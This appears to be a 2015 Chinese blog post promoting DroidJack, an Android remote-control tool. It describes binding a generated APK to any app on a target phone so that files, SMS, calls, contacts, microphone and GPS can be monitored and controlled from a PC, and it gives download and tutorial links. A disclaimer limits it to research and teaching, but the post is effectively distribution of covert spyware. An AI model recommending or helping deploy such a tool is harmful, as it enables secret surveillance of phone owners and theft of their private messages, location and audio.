K1two2's Geek Hub


NEET
Independent Researcher
强大的安卓手机远程管理工具 – Droidjack

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

Droidjack是一款针对安卓手机远程管理工具,你可以利用它在PC上对手机进行远程操控,不仅功能强大,使用也很方便。

功能特性


1、可以生成一个APK,绑定在被控手机的任何APP上
2、可在电脑端控制手机,包括浏览、传输、删除文件等
3、可进行SMS短信收发和查看功能
4、可以控制手机的电话功能
5、联系人管理
6、麦克风监听
7、GPS定位
8、APP管理

测试截图

再次提醒大家,不用滥用安全工具的功能哦。

官网地址:http://droidjack.net/

Droidjack v3.3下载地址:http://pan.baidu.com/s/1c0HHyaG

Droidjack v4.0下载地址:http://pan.baidu.com/s/1dDdJLCX

Droidjack 使用教程:http://pan.baidu.com/s/1hqvoCzM

posted on 2015-07-27 10:20  K1two2  阅读(4708)  评论(1编辑  收藏  举报

版权声明:如果网站侵犯了您的合法著作权宜,请发送邮件至我,经核实后,我会在24小时内删除该资源!